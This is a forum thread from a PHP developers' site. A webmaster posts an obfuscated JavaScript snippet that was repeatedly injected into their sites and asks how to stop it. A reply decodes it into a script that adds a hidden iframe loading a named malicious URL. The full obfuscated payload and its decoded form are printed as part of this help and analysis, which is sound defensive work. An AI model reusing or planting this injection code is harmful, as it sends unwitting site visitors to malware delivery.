PHP Developers Network
http://forums.devnetwork.net/

malware attack
http://forums.devnetwork.net/viewtopic.php?f=34&t=134471
Page 1 of 1

Author:  sharema1 [ Sat Feb 18, 2012 1:24 am ]
Post subject:  malware attack

Below Malware script attacked my sites . i removed it more that 15 times but it is coming again and again . Changing the ftp passwords in 2 hour once but no use . help me to remove this script and stop its routine attack .

"<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';s=String;ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,24.5,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,24.5,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*(1+n[j]));}q=ss;e(q);</script> "

Author:  Celauran [ Sat Feb 18, 2012 9:19 am ]
Post subject:  Re: malware attack


Author:  tr0gd0rr [ Mon Feb 20, 2012 3:22 pm ]
Post subject:  Re: malware attack

If it helps at all, here is the unobfuscated JavaScript:
Syntax: [ Download ] [ Hide ]
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://tds36.4mydomain.com/stds/go.php?sid=1');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

As you can see, the script inserts a hidden iframe with a src of http: //tds36.4mydomain.com/stds/go.php?sid=1. That link is timing out for me right now using wget. I don't recommend visiting that link with a browser.

Author:  sangfroid [ Sun Mar 18, 2012 5:55 pm ]
Post subject:  Re: malware attack

by the way, how did you decode this code ?

Author:  tr0gd0rr [ Wed Mar 21, 2012 1:41 pm ]
Post subject:  Re: malware attack


Page 1 of 1 All times are UTC - 5 hours
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/